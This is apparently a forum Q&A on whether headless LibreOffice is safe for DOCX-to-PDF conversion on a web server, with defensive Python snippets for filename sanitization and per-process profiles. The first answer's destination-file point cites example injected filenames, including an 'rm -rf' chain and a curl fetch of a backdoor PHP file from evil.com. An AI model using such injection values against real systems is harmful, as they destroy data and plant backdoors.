Is LibreOffice (headless) safe to use on a web server?
I have my-template.docx that I convert into my-report.docx with OpenXml and then my-report.pdf with:
soffice --headless --convert-to pdf my-report.docx
TL;DR in your case, it is.
What you're almost certainly doing is replacing some information inside the DOCX and using LibreOffice to have a "nice" conversion to PDF. While there are other tools that might do something like that (wkhtmltopdf for example), you're not using LibreOffice in any vulnerable way that I'm aware of (and I use LibreOffice like you do too):
- the source document is under your control (no user-entered macros, remote file inclusions, remote data sources or other shenanigans)
- the values you inject into the DOCX are also under your control - or are they? - and do not contain user input such as HREF targets that might make it into the PDF.
- LibreOffice in headless mode does not expose any open ports or interfaces that might be exploited by a third process.
Possible but unlikely "exploit" avenues that might remain:
- the destination file. I expect that even if you asked the user for the name of the resulting file, you would still create a unique PDF filename yourself and send the user's name only as
Content-Disposition: attachment; filename="thatswhatshesaid";
rather than using the user's filename on your filesystem and sending back a Location: downloads/whatshesaid.pdf. That would risk saving data to "byebye.pdf && rm -rf ..." (or "irrelevant.pdf\x00; curl -o index2.php http://evil.com/backdoor.php", or ...).
- very large values in the XML output that might trigger anomalous behaviour. Chances of this happening, and of doing so in any meaningful (for the attacker) way, are negligible, but still, nothing's wrong with checking.
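To make the destination-file point concrete, here is a minimal Python sketch, not a definitive implementation. It assumes a hypothetical storage directory (DOWNLOAD_DIR) and hypothetical helper names (storage_path, safe_download_name, content_disposition); none of these come from the question. The idea is that the name on disk is generated by the server, and the user's name only ever appears, sanitized, in the response header.

```python
import re
import uuid
from pathlib import Path

# Hypothetical location for generated PDFs; adjust to your deployment.
DOWNLOAD_DIR = Path("/var/spool/reports")


def storage_path() -> Path:
    """Return a server-chosen path; no user input reaches the filesystem."""
    return DOWNLOAD_DIR / f"{uuid.uuid4().hex}.pdf"


def safe_download_name(user_name: str, fallback: str = "report.pdf") -> str:
    """Reduce a user-supplied name to a conservative ASCII subset."""
    # Replace everything outside letters, digits, dot, underscore and hyphen.
    safe = re.sub(r"[^A-Za-z0-9._-]", "_", user_name).strip("._")[:100]
    if not safe:
        safe = fallback
    if not safe.lower().endswith(".pdf"):
        safe += ".pdf"
    return safe


def content_disposition(user_name: str) -> str:
    """Build the header value that carries the user's preferred name."""
    return f'attachment; filename="{safe_download_name(user_name)}"'
```

With this split, a name such as "byebye.pdf && rm -rf ..." can at worst produce an odd-looking download name in the browser; it never becomes a path or part of a shell command.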
As long as you control the content of the input file there should be no issue at all. Keep in mind that LibreOffice only allows one active instance per user profile, so if you want to be able to process more than one document in parallel you should use separate user profiles.
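One way to get a separate profile per conversion is to point each soffice process at its own profile directory through the -env:UserInstallation bootstrap variable. The following Python sketch assumes soffice is on the PATH; the function names, the temporary-directory approach and the timeout value are illustrative assumptions, not something the question prescribes.

```python
import subprocess
import tempfile
from pathlib import Path


def build_convert_command(docx: Path, outdir: Path, profile_dir: Path) -> list[str]:
    """Build a soffice command line that uses its own user profile."""
    return [
        "soffice",
        # Each process gets a private profile, so instances do not collide.
        f"-env:UserInstallation={profile_dir.resolve().as_uri()}",
        "--headless",
        "--convert-to", "pdf",
        "--outdir", str(outdir),
        str(docx),
    ]


def convert_to_pdf(docx: Path, outdir: Path, timeout: float = 120.0) -> Path:
    """Convert one document using a throwaway profile directory."""
    with tempfile.TemporaryDirectory(prefix="lo-profile-") as profile:
        cmd = build_convert_command(docx, outdir, Path(profile))
        # The timeout is an assumed safety net against a hung conversion.
        subprocess.run(cmd, check=True, timeout=timeout)
    # soffice names the output after the input file's stem.
    return outdir / (docx.stem + ".pdf")
```

Creating a fresh profile for every call costs some startup time; a small pool of long-lived profile directories, one per worker, would be a reasonable alternative.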
If you have untrusted input data, the whole question becomes more complex to answer. While there has been quite a bit of work on securing the code base, a desktop office suite is still a huge piece of software with a lot of potential attack surface (macros, remote data connections, old binary file formats, ...). While all of these features should be blocked in headless operation, you have to trust that there are no undiscovered bugs.
The remaining points in the Microsoft article should not apply to LibreOffice. The headless mode is designed not to interact with the desktop environment and, except for the user profile, does not change anything in the system or depend on any desktop-related component. The default builds will still depend on some GUI libraries, but if that actually becomes a problem there is an experimental build option to build a non-GUI version without any X/GTK/KDE library dependencies.
As an alternative, there are also a few projects built on top of LibreOffice that try to make converting documents even easier and might actually be faster by pre-forking or using the LibreOfficeKit API. Two examples are JODConverter and unoconv.